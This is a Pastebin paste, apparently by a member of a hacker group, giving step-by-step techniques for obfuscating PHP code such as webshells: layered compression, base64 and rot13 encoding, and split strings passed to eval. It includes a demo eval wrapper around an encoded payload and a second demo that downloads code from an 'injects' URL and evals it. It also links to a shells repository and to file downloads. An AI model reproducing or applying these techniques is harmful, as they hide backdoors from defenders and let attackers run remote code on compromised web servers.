Advertisement
Yamraaj

Boom Chitti 1.5 - php_obfuscator_decoder

Aug 22nd, 2014
304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.60 KB | None | 0 0
  1. lets do some phpshit shall we..
  2. need to automated those things, if anyone could help  
  3. i was trying many encoding and compressing to obfuscate php lately
  4. the most effective technique i have found is :-
  5. to
  6. 1. escape and quote('') html & style scripts into echo'' or any, so the <?php ?> tag continues.
  7. 2. take some 'ultasidha' functions like > public function terimaki($aankh){};
  8. 3. use some layered variables( can be 'ultasidha' like > $_-bal-_cher ) in ur code
  9. 4. compress it to 9th level using gzcompress, gzdeflate, gzencode (i prefer deflate)
  10. 5. use layered base_64 encode and/or string rotate, regular expression replace, byterun...
  11. 6. split and concat your chunks(encoded) as many as possible (use strpos for manual input)--- Demo code 1
  12. 7. Go to 4  if you like to play and the processes continues
  13. 8. host your code to your personal server and use file_get_content--- Demo code 2
  14. try decoding v3.3 for best practice > https://code.google.com/p/shells/
  15. Demo code 1 (no garbage):-
  16. <?php
  17. function india($yamraaj){eval("\$ihos=gz" . "inf" . "la" . "te(b" . "as" . "e6" . "4_d" . "ec" . "ode(\$yamraaj));eval(\$ihos);");}
  18. india("
  19. 'JZvHbsRIlkX39SNd"."BS5okwbd0wV6n3RJ"."qCwrChAlmv//RzcQ"."PMn/+ddff/317z/+'
  20. .'/u9//v4/'
  21. ");
  22. Demo code 2 :-
  23. <?
  24. $in73ct = "http://injects.googlecode.com/files/sssss.txt";
  25. $inj3ct = file_get_contents($in73ct);
  26. eval (gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($inj3ct)))))));
  27. ?>
  28. files :-
  29. http://scci.com.pk/obf.php (translated version)
  30. http://www.4shared.com/zip/cAfDJsDGba
  31.  
  32. Link :- facebook.com/indiansquad | Indian Hacker's Online Squad ( i-HOS)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement